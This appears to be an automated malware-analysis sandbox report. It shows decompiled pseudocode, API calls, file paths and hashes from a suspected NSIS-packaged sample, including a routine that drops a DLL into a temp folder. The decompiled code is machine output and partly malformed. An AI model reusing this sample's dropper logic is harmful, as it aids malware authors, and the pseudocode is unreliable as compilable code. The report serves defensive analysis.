				E004059FF(_t18, _t24, _t26, 0x40af70,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af54);
				_push(_t14);
				_push(_t26);
				E0040593B();
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                0x00401d29
                                                                                0x00401d42
                                                                                0x00401d4c
                                                                                0x00401d51
                                                                                0x00401d5c
                                                                                0x00401d63
                                                                                0x00401d75
                                                                                0x00401d7b
                                                                                0x00401d80
                                                                                0x00401d8a
                                                                                0x004024b8
                                                                                0x00401561
                                                                                0x00402833
                                                                                0x0040288e
                                                                                0x0040289a

                                                                                APIs
                                                                                • GetDC.USER32(?), ref: 00401D22
                                                                                • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                • CreateFontIndirectA.GDI32(0040AF54), ref: 00401D8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CapsCreateDeviceFontIndirect
                                                                                • String ID:
                                                                                • API String ID: 3272661963-0
                                                                                • Opcode ID: 78f79da71c4801185515a33ee10eecec6988933ac577fdebba6a0d8b1e27de8a
                                                                                • Instruction ID: 822a585a95499be2ccb46a886614a983d19f7779af01092212c1c8a44adbdb5d
                                                                                • Opcode Fuzzy Hash: 78f79da71c4801185515a33ee10eecec6988933ac577fdebba6a0d8b1e27de8a
                                                                                • Instruction Fuzzy Hash: 80F04FF1A49742AEE70167B0AE0AB9A3B659719306F14043AF242BA1E2C5BC0454DB7F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402BBE, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00402BBE(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x417020; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x423e8c;
						if(_t2 >  *0x423e8c) {
							_t3 = CreateDialogParamA( *0x423e80, 0x6f, 0, E00402B3B, 0);
							 *0x417020 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405D34(0);
					}
				} else {
					_t6 =  *0x417020; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x417020 = 0;
					return _t6;
				}
			}






                                                                                0x00402bc5
                                                                                0x00402bdf
                                                                                0x00402be5
                                                                                0x00402bef
                                                                                0x00402bf5
                                                                                0x00402bfb
                                                                                0x00402c0c
                                                                                0x00402c15
                                                                                0x00000000
                                                                                0x00402c1a
                                                                                0x00402c21
                                                                                0x00402be7
                                                                                0x00402bee
                                                                                0x00402bee
                                                                                0x00402bc7
                                                                                0x00402bc7
                                                                                0x00402bce
                                                                                0x00402bd1
                                                                                0x00402bd1
                                                                                0x00402bd7
                                                                                0x00402bde
                                                                                0x00402bde

                                                                                APIs
                                                                                • DestroyWindow.USER32(00000000,00000000,00402D9E,00000001), ref: 00402BD1
                                                                                • GetTickCount.KERNEL32 ref: 00402BEF
                                                                                • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402C1A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                • String ID:
                                                                                • API String ID: 2102729457-0
                                                                                • Opcode ID: 50cad02e8e5130e21afec5b84b980190e03444a6c51cc52df83e5c8e70531577
                                                                                • Instruction ID: a3ab2f2dac12ce22498011616add61d7de1d78e836dea8abd506d70d28008bcd
                                                                                • Opcode Fuzzy Hash: 50cad02e8e5130e21afec5b84b980190e03444a6c51cc52df83e5c8e70531577
                                                                                • Instruction Fuzzy Hash: DBF0DA31D09320ABC661AF14FD4CADB7B75BB09B127014936F101B52E8D7786881CBAD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004037EF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004037EF(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405954(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ec4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423e90 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ec0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423660 = _t18[1];
					 *0x423f28 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42365c = _t23;
						E0040593B(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420450, E004059FF(_t13, _t24, _t26, 0x423680, 0xfffffffe));
						_t11 =  *0x423eac;
						_t27 =  *0x423ea8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E004059FF(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                                0x004037f3
                                                                                0x004037f8
                                                                                0x004037fe
                                                                                0x00403803
                                                                                0x00403803
                                                                                0x0040380b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403813
                                                                                0x0040381b
                                                                                0x0040381d
                                                                                0x00403823
                                                                                0x00403823
                                                                                0x00403825
                                                                                0x00403831
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403835
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403837
                                                                                0x0040383c
                                                                                0x00403845
                                                                                0x0040384b
                                                                                0x00403850
                                                                                0x00403864
                                                                                0x0040386f
                                                                                0x00403887
                                                                                0x0040388d
                                                                                0x00403892
                                                                                0x0040389a
                                                                                0x004038bb
                                                                                0x004038bb
                                                                                0x004038bb
                                                                                0x0040389c
                                                                                0x0040389e
                                                                                0x0040389e
                                                                                0x004038a2
                                                                                0x004038a9
                                                                                0x004038a9
                                                                                0x004038ae
                                                                                0x004038b4
                                                                                0x004038b4
                                                                                0x00000000
                                                                                0x0040389e
                                                                                0x00403852
                                                                                0x00403857
                                                                                0x00403860
                                                                                0x00403859
                                                                                0x00403859
                                                                                0x00403859
                                                                                0x00403857

                                                                                APIs
                                                                                • SetWindowTextA.USER32(00000000,00423680), ref: 00403887
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: TextWindow
                                                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 530164218-2030658151
                                                                                • Opcode ID: cfbf6f84c2dc85c0809cf79f5c0f3b1c427e60ac56a0f4f8c024dcc57e8c842e
                                                                                • Instruction ID: 1abde7c3b4d11e9a2e55591403c44a3397e590d434b7b54f33d2a439c9831bdd
                                                                                • Opcode Fuzzy Hash: cfbf6f84c2dc85c0809cf79f5c0f3b1c427e60ac56a0f4f8c024dcc57e8c842e
                                                                                • Instruction Fuzzy Hash: 0711C276B002119BC730AF55D8809377BADEF4471631981BFE80167390C73D9E028B98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404CCB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00404CCB(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420460 != _t22) {
							 *0x420460 = _t22;
							E004059DD(0x420478, 0x424000);
							E0040593B(0x424000, _t22);
							E0040140B(6);
							E004059DD(0x424000, 0x420478);
						}
						L11:
						return CallWindowProcA( *0x420468, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E0040464A(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403DDB(0x413);
				return 0;
			}




                                                                                0x00404cd7
                                                                                0x00404cfc
                                                                                0x00404d1c
                                                                                0x00404d1f
                                                                                0x00404d22
                                                                                0x00404d39
                                                                                0x00404d3f
                                                                                0x00404d46
                                                                                0x00404d4d
                                                                                0x00404d54
                                                                                0x00404d59
                                                                                0x00404d5f
                                                                                0x00000000
                                                                                0x00404d6f
                                                                                0x00404d09
                                                                                0x00404d5c
                                                                                0x00404d5c
                                                                                0x00000000
                                                                                0x00404d5c
                                                                                0x00404d15
                                                                                0x00404d17
                                                                                0x00000000
                                                                                0x00404d17
                                                                                0x00404cdd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404ce4
                                                                                0x00000000

                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 00404D01
                                                                                • CallWindowProcA.USER32 ref: 00404D6F
                                                                                  • Part of subcall function 00403DDB: SendMessageA.USER32 ref: 00403DED
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                • String ID:
                                                                                • API String ID: 3748168415-3916222277
                                                                                • Opcode ID: a1150b60a9ff9773b0f32f848bf3c6cc668db0625d4fd9b06fd37084bc95013e
                                                                                • Instruction ID: 2250b5ae86c5db7695da18b81197a994f129f58ca555af08ca8730d1192fac1c
                                                                                • Opcode Fuzzy Hash: a1150b60a9ff9773b0f32f848bf3c6cc668db0625d4fd9b06fd37084bc95013e
                                                                                • Instruction Fuzzy Hash: 5A118CB1600208BBDF217F629C4099B3B69EF84765F00813BFB14392A2C77C8951CFA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 10001650, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 40%
                                                                                			E10001650(char _a4, signed int _a8) {
				void* __esi;
				void* _t34;
				intOrPtr* _t35;
				short _t37;
				struct _COORD _t41;
				signed int _t43;
				void* _t44;
				signed int _t45;
				void* _t47;

				_t43 = _a8;
				_t41 = 0x1f;
				_t2 = _t41 - 0x15; // 0xa
				_t37 = _t2;
				if(_t43 > 3) {
					_t6 = __esi - 4; // 0x100011ba
					__ecx = _t6;
					__edx = 0xaaaaaaab * __ecx >> 0x20;
					__edx = 0xaaaaaaab * __ecx >> 0x20 >> 1;
					0xd + __edx * 2 = 0xd + __edx * 2 + __edx;
				}
				_t44 = _t43 - (0x55555556 * _t43 >> 0x20 >> 0x1f) + (0x55555556 * _t43 >> 0x20) + ((0x55555556 * _t43 >> 0x20 >> 0x1f) + (0x55555556 * _t43 >> 0x20)) * 2;
				if(_t44 != 0) {
					_t45 = _t44 + 0xffffffff;
					if(_t45 != 0) {
						_t41 = 0x1f + _t45 * 8;
					}
				} else {
					_t19 = _t44 + 0x2f; // 0x100011ed
					_t41 = _t19;
				}
				0x10002004->X = _t41;
				 *0x10002006 = _t37;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0x10002004);
				_pop(_t43);
				_a8 = _a4;
				_a4 = 0x10005b20;
				_pop(_t47);
				_t34 =  *0x10000000(1, _t43, _t47);
				_t35 = E100010B0();
				return  *0x10000000( *_t35,  *((intOrPtr*)(_t35 + 4)), _t34, _a4, 0,  &_a8);
			}












                                                                                0x10001654
                                                                                0x10001658
                                                                                0x1000165d
                                                                                0x1000165d
                                                                                0x10001663
                                                                                0x10001665
                                                                                0x10001665
                                                                                0x1000166d
                                                                                0x1000166f
                                                                                0x10001678
                                                                                0x10001678
                                                                                0x1000168b
                                                                                0x1000168d
                                                                                0x10001694
                                                                                0x10001697
                                                                                0x10001699
                                                                                0x10001699
                                                                                0x1000168f
                                                                                0x1000168f
                                                                                0x1000168f
                                                                                0x1000168f
                                                                                0x100016a0
                                                                                0x100016a7
                                                                                0x100016bd
                                                                                0x100016c8
                                                                                0x100016c9
                                                                                0x100016cc
                                                                                0x100016d3
                                                                                0x10001629
                                                                                0x1000163a
                                                                                0x1000164f

                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F5,751A0170,00000001,?,100011BE,0000004F,00000001), ref: 100016B6
                                                                                • SetConsoleCursorPosition.KERNEL32(00000000,?,100011BE,0000004F,00000001), ref: 100016BD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.235794772.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.235775448.0000000010000000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235800984.0000000010003000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235807350.0000000010004000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235820043.0000000010006000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ConsoleCursorHandlePosition
                                                                                • String ID: VUUU
                                                                                • API String ID: 4283984680-2040033107
                                                                                • Opcode ID: 39d495abec72cf87f7ceb91c67712e22ff57615e47964f83734604b28241f692
                                                                                • Instruction ID: 979864d391ecf3135f92dc2d53c143b6b646264048b91cc38c7d372249cf85a3
                                                                                • Opcode Fuzzy Hash: 39d495abec72cf87f7ceb91c67712e22ff57615e47964f83734604b28241f692
                                                                                • Instruction Fuzzy Hash: 2C01F7328001149BE308CF5CCD846EDB7EDEF483E0F88811AE915972B5E771EA15CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004024BE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004024BE(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029F6(0x11));
				} else {
					E004029D9(1);
					 *0x409f50 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405954(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nss398D.tmp\8pspgamerixa.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                0x004024be
                                                                                0x004024be
                                                                                0x004024c1
                                                                                0x004024dc
                                                                                0x004024c3
                                                                                0x004024c5
                                                                                0x004024ca
                                                                                0x004024d1
                                                                                0x004024e3
                                                                                0x0040265c
                                                                                0x0040265c
                                                                                0x004024e9
                                                                                0x004024fb
                                                                                0x004015a6
                                                                                0x004015a8
                                                                                0x00000000
                                                                                0x004015ae
                                                                                0x004015a8
                                                                                0x0040288e
                                                                                0x0040289a

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
                                                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nss398D.tmp\8pspgamerixa.dll,00000000,?,?,00000000,00000011), ref: 004024FB
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\nss398D.tmp\8pspgamerixa.dll, xrefs: 004024CA, 004024EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileWritelstrlen
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nss398D.tmp\8pspgamerixa.dll
                                                                                • API String ID: 427699356-2447809126
                                                                                • Opcode ID: ff897398b1e0c06aafe73c6d78e32e85bf540523cdd7488225d2a91f8090bf00
                                                                                • Instruction ID: 28baf68bc3b2ef7cd727d17ca875bc327529d04ff6cae4c8aacaeccaaba980a4
                                                                                • Opcode Fuzzy Hash: ff897398b1e0c06aafe73c6d78e32e85bf540523cdd7488225d2a91f8090bf00
                                                                                • Instruction Fuzzy Hash: 5AF0B4B2A04241FBDB40BBA09E49AAE37689B00348F10443BA206F51C2D6BC4982A76D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403491, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00403491() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f434;
				_t3 = E00403476(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f434 =  *0x41f434 & 0x00000000;
				return _t3;
			}







                                                                                0x00403492
                                                                                0x0040349a
                                                                                0x004034a1
                                                                                0x004034a4
                                                                                0x004034a4
                                                                                0x004034a6
                                                                                0x004034ab
                                                                                0x004034b2
                                                                                0x004034b8
                                                                                0x004034bc
                                                                                0x004034bd
                                                                                0x004034c5

                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,00000000,00000000,00403469,004032BC,00000000), ref: 004034AB
                                                                                • GlobalFree.KERNEL32 ref: 004034B2
                                                                                Strings
                                                                                • "C:\Users\user\Desktop\h8lD4SWL35.exe" , xrefs: 004034A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Free$GlobalLibrary
                                                                                • String ID: "C:\Users\user\Desktop\h8lD4SWL35.exe"
                                                                                • API String ID: 1100898210-3872839294
                                                                                • Opcode ID: 3e2f1a94e1730b0e2f77525ddf4d06804517b8e77a23c02aa7cd98468957b701
                                                                                • Instruction ID: 7bfc0464e02b508f879d35a29cae48101a6ab00b4f5f00e512934bdeb57274a8
                                                                                • Opcode Fuzzy Hash: 3e2f1a94e1730b0e2f77525ddf4d06804517b8e77a23c02aa7cd98468957b701
                                                                                • Instruction Fuzzy Hash: FBE08C3280653097C7221F05AE04B9AB66C6F94B22F068076E8407B3A1C3782C428AD8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405517, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405517(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                0x00405518
                                                                                0x00405522
                                                                                0x00405524
                                                                                0x0040552b
                                                                                0x00405533
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405533
                                                                                0x00405535
                                                                                0x0040553a

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\h8lD4SWL35.exe,C:\Users\user\Desktop\h8lD4SWL35.exe,80000000,00000003), ref: 0040551D
                                                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\h8lD4SWL35.exe,C:\Users\user\Desktop\h8lD4SWL35.exe,80000000,00000003), ref: 0040552B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CharPrevlstrlen
                                                                                • String ID: C:\Users\user\Desktop
                                                                                • API String ID: 2709904686-1246513382
                                                                                • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                • Instruction ID: 1341b21386aa9ee456471dc2eb10899dbff8c866770b3e7d35d8712ddbbc4649
                                                                                • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                • Instruction Fuzzy Hash: D9D0C7B2509DB06EE7035614DC04B9F7B89DF17710F1944A2E540A61D5D27C5D418BFD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 10001240, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7processCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E10001240() {
				void* _t4;

				system("cls");
				E100012F0(_t4);
				__imp___getch();
				return 0;
			}




                                                                                0x10001245
                                                                                0x1000124e
                                                                                0x10001253
                                                                                0x1000125b

                                                                                APIs
                                                                                • system.MSVCRT ref: 10001245
                                                                                  • Part of subcall function 100012F0: system.MSVCRT ref: 100012F9
                                                                                  • Part of subcall function 100012F0: _printf.MSPDB140-MSVCRT ref: 10001304
                                                                                  • Part of subcall function 100012F0: _printf.MSPDB140-MSVCRT ref: 1000130E
                                                                                  • Part of subcall function 100012F0: _printf.MSPDB140-MSVCRT ref: 10001318
                                                                                  • Part of subcall function 100012F0: _printf.MSPDB140-MSVCRT ref: 10001322
                                                                                  • Part of subcall function 100012F0: _printf.MSPDB140-MSVCRT ref: 1000132C
                                                                                • _getch.MSVCRT ref: 10001253
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.235794772.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.235775448.0000000010000000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235800984.0000000010003000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235807350.0000000010004000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.235820043.0000000010006000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: _printf$system$_getch
                                                                                • String ID: cls
                                                                                • API String ID: 668655315-3046418502
                                                                                • Opcode ID: 13fa221e3d722fdd3abb211051ce386eaec9b8eb32e95a855de29e21455896d0
                                                                                • Instruction ID: bf516c52ec6e75f39a5d1850db2ad857acc66f35cae09d1e820852db7ffb4ff5
                                                                                • Opcode Fuzzy Hash: 13fa221e3d722fdd3abb211051ce386eaec9b8eb32e95a855de29e21455896d0
                                                                                • Instruction Fuzzy Hash: 2DB092645130114BF20167B44C9D04B3668AF493CAB008030F106C001EDA1552644627
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405629, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405629(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                0x00405635
                                                                                0x00405637
                                                                                0x0040565f
                                                                                0x00405644
                                                                                0x00405649
                                                                                0x00405654
                                                                                0x00000000
                                                                                0x00405671
                                                                                0x0040565d
                                                                                0x0040565d
                                                                                0x00000000

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
                                                                                • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405649
